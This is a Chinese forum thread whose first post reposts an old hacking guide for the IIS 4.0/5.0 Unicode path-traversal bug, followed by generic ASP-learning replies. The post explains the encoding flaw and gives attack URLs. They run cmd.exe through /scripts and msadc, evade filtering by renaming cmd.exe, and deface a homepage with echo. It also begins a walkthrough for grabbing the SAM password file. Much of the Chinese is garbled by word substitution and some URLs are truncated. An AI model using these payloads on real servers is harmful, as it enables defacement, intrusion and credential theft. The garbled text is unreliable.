仓酷云

标题: ASP编程：unicode最终使用《转》 [打印本页]

作者: 灵魂腐蚀 时间: 2015-1-16 23:19
标题: ASP编程：unicode最终使用《转》
ASP一般认为只能运行在IIS上，正如前面所提到的，这并不是十分正确，事实上，ASP也能运行在Apache上。ApacheASP可在任意Apache服务器上运行有限的ASP功能，所需做的，只需打开mod_perl。比来这些日子很多多少的WINNT的服务器被黑，特别是国际的。上面是一些详细示例的总结。
上面这范例的毛病以发明近一年多了，一年多前在外洋的黑客网站就有了相似的文章，但
是事先并没有良多人器重。,在反北约的黑客战中有良多就是用上面这些例子了。
不外直到UNICOUDE毛病的发明，黑NT的盘算机变的傻瓜化了。上面我把比来的一些文章总
结一下。
但愿人人能从这里体味到点甚么。（上面的文章来自一些邮件列表和BBS）

道理：(实在本来都很类似，我拿这个做个例子。)

NSFOCUS平安小组发明IIS4.0和IIS5.0在Unicode字符解码的完成中存在一个平安毛病，
招致用户能够远程经由过程IIS实行恣意命令。当IIS翻开文件时，假如该文件名包括unicode
字符，它会对其举行解码，假如用户供应一些特别的编码，将招致IIS毛病的翻开大概执
行某些web根目次之外的文件。
关于IIS5.0/4.0中文版，当IIS收到的URL哀求的文件名中包括一个特别的编码比方"%c1%hh"
大概"%c0%hh",它会起首将其解码酿成:0xc10xhh，然后实验翻开这个文件，Windows体系
以为0xc10xhh多是unicode编码，因而它会起首将其解码，假如0x00<=%hh<0x40的话，
接纳的解码的格局与上面的格局相似：
%c1%hh->(0xc1-0xc0)*0x40+0xhh
%c0%hh->(0xc0-0xc0)*0x40+0xhh
因而，使用这类编码，我们能够机关良多字符，比方:
%c1%1c->(0xc1-0xc0)*0x40+0x1c=0x5c=/
%c0%2f->(0xc0-0xc0)*0x40+0x2f=0x2f=
打击者能够使用这个毛病来绕过IIS的路径反省，往实行大概翻开恣意的文件。
(1)假如体系包括某个可实行目次，便可能实行恣意体系命令。上面的URL大概
列出以后目次的内容：
http://www.victim.com/scripts/..%c1.../cmd.exe?/c+dir
(2)使用这个毛病检察体系文件内容也是大概的：
http://www.victim.com/a.asp/..%c1%1..../winnt/win.ini
RainForestPuppy测试发明关于英文版的IIS4.0/5.0,此成绩一样
存在，只是编码格局略有分歧，酿成"%c0%af"大概"%c1%9c".
上面我们的例子以%c1%1c为主解说。
注:+号能够用%20取代,依这类格局你还能够机关出很多命令
很多多少站点inetpub下的scripts目次删除，
但ProgramFilesCommonFilesSystem下
的msadc还在（有msadcs.dll毛病的话就不必
%c1%1c了）。这时候能够以下机关哀求：
http://ip/msadc/..%c1%1c../..%c1%1c....exe?/c+dir+c:

理论一：（修正主页----最复杂化的一种）

良多进侵都以修正主页的情势体现出来，这一般有两种情形：一是表达本人的
气愤――好比昔时以美国为首的北约轰炸我驻南使馆的突发事务以后，国际良多黑客
在ICQ、BBS一呼百诺，纷繁对敌国举行各类情势的打击，固然以交换主页最为民怨沸腾！
二是在给网管发e-mail毛病呈报以后没反响，有的黑客按耐不住，就用修正主页的体例给
予告诫，用以引发人们关于平安手艺的器重。固然提及来这是守法的啦，以是人人要注重
哦，不要光图一时的利落索性，呵呵！
可使用ECHO命令、管道符等创建文件，修正文件内容。但由于IIS加载程序检测到有
CMD.EXE大概COMMAND.COM串就要检测特别字符“&|(,;%”，假如发明有这些字符就会返
回500毛病，以是不克不及间接利用CMD.EEX加管道符等。因而能够接纳拷贝CMD.EXE换名的办法
绕已往。
http://xxx.xxx.xxx.xxx/scripts/..%c...scriptsccc.exe
然后
http://xxx.xxx.xxx.xxx/scripts/ccc....ked+by+chinese+>+f:wwwrootxxxdefault.asp
http://xxx.xxx.xxx.xxx/scripts/ccc....+echo+1/1/2001+>>+f:wwwrootxxxdefault.asp
就改了主页了！
这类办法关于有负载平衡的主机很不便利，又必要几回才干完成，以是欠好。袁哥给出了
另外一种更便利的举措。参考袁哥（yuange）的帖子《IIS不必拷贝CMD.EXE利用管道符等的方
法》，能够如许：
http://xxx.xxx.xxx.xxx/scripts/..%c...nt/system32/cmd".exe?/c+echo+Hacked+by+
hacker+>+f:wwwrootxxxdefault.asp
http://xxx.xxx.xxx.xxx/scripts/..%c...nt/system32/cmd".exe?/c+echo+12/1/2k+>>+
f:wwwrootxxxdefault.asp
如许，主页就被变动成了：
Hackedbyhacker
12/1/2k
固然我是没有如许做啦，不外这些器材我都在本人设置的情况下完成了，

在我实习的过程当中发明，用ECHO写这些的时分很慢，假如你屡次回车，过一阵屏幕革新后
主页上就会留下多个你要写的内容。

理论二（下载SAM文件）

http://xxx.xxx.xxx.xxx/scripts/..%c.../winnt/system32
/cmd.exe?/c+dir%20c:发明列出了远程主机C:下的一切文件，
实行：http://xxx.xxx.xxx.xxx/scripts/..

作者: 海妖 时间: 2015-1-20 09:30
作为IE上广为流传的动态网页开发技术,ASP以它简单易学博得了广大WEB程序爱好这的青睐,而且它对运行环境和开发品台的不挑剔,以及有大量有效的参考手册,极大的推广了它的发展。

作者: 若天明 时间: 2015-1-29 06:25
运用经典的例子。并且自己可以用他来实现一些简单的系统。如果可以对他进行进一步的修改，找出你觉得可以提高性能的地方，加上自己的设计，那就更上一个层次了，也就会真正地感到有所收获。

作者: 深爱那片海 时间: 2015-2-5 20:25
我认为比较好的方法是找一些比较经典的例子，每个例子比较集中一种编程思想而设计的。

作者: 小女巫 时间: 2015-2-13 07:42
我们必须明确一个大方向，不要只是停留在因为学而去学,我们应有方向应有目标.

作者: 小妖女 时间: 2015-3-3 17:49
虽然ASP也有很多网络教程。但是这些都不系统。都是半路出家，只是从一个例子告诉你怎么用。不会深入讨论，更不会将没有出现在例子里的方法都一一列举出来。

作者: 变相怪杰 时间: 2015-3-11 11:55
从事这个行业，那么你可以学ASP语言，简单快速上手，熟练dreamweav排版，写asp代码，熟练photoshop处理图片，打好基础就行了

作者: 只想知道 时间: 2015-3-18 10:06
Server:这个表示的服务器，操作服务器的一些东西使用这个，如Server.Mappath转换服务器路径,Server.CreateObject实例化一个组件

作者: 小魔女 时间: 2015-3-25 15:30
我想问如何掌握学习节奏(先学什么再学什么)最好详细点?

欢迎光临仓酷云 (http://ckuyun.com/)